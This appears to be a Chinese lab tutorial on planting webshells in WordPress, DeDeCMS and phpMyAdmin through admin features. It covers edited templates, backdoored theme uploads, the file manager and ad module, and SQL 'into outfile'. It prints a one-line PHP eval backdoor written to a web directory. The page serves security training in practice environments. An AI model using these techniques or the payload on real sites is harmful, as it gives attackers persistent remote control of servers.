当前位置: 首页 > news >正文

常⻅CMS漏洞

⼀:WordPress

1.1后台修改模板拿WebShell

1.1.1进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装

1.1.2思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击

在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮

1.1.3访问以下连接即可获取WebShell

1.2上传主题拿WebShell

1.2.1接着上⼀个环境使⽤...将带有后⻔的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外 观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】

将我们的一句话木马放到压缩包里随着压缩包一起上传

二.DeDeCMS

2.1通过⽂件管理器上传WebShell

2.1.1访问⽬标靶场其思路为 dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传

php⽂件获取webshell.

2.2.2登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代 码上传...OK

2.2修改模板⽂件拿WebShell

2.2.1与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 - -》 【index.htm】 --> 【修改】 在⽂件修改中添加⼀句话代码....如

2.3后台任意命令执⾏拿WebShell

2.3.1点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添 加⼀句话代码--》点击 【确定】

2.4通过后台sql命令执⾏拿webshell

2.4.1访问系统---sql命令⾏⼯具---执⾏ select @@ basedir,获取mysql路径,由此瑞测⽹站绝对路径

select '<?php @eval($_POST[cmd]);?>' into outfile 'E:/phpstudy_pro/WWW/6.php'

三.PhPMyadmin

3.1导⼊导出拿WebShell

3.1.1通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。

3.2界⾯图像化GetShell

3.2.1如果过滤了 into outfile 第⼀种的图形化操作

http://www.dtcms.com/a/306429.html

相关文章:

  • 力扣面试150题--只出现一次的数字
  • 【预判一手面试问题:排序】
  • 网络端口号全景解析:从基础服务到特殊应用的完整指南
  • kotlin类型可为空,进行空安全的区别
  • Prometheus实战教程 02 - Prometheus 配置详解
  • 歌尔微报考港交所上市:业绩稳增显韧性,创新引领生态发展
  • 从一开始的网络攻防(十四):WAF绕过
  • 在 CentOS 7 上安装 MinIO
  • 扣子,正式拥抱开源!
  • [SKE]UVM环境下OpenSSL加密算法参考模型设计
  • 过滤器Filter
  • 光谱相机自动调焦曝光控制
  • 基于定制开发开源AI智能名片S2B2C商城小程序的B站私域流量引流策略研究
  • RAG实战指南 Day 29:RAG系统成本控制与规模化
  • 技术赋能幼儿园毕业季:从数字化纪念到成长数据可视化
  • django-3模型操作
  • 疯狂星期四文案网第24天运营日记
  • cmake项目基本demo
  • AWS IAM:安全访问管理的核心指南
  • 开发避坑短篇(10):ArithmeticException无限循环小数的精确处理方案
  • 地图可视化实践录:显示高德地图和百度地图
  • JavaWeb前瞻—JDBC
  • Rabbitmq中常见7种模式介绍
  • QString 内存机制详解
  • 【Excel】制作双重饼图
  • 恢复IP地址
  • 明远智睿V2H核心模组:工业4.0时代的“性价比革命”
  • 双塔模型 + 自监督学习:解决长尾物品表征难题
  • IBus vs. Fcitx5:一场 Linux 输入法框架的正面交锋
  • Maximum Subarray Sum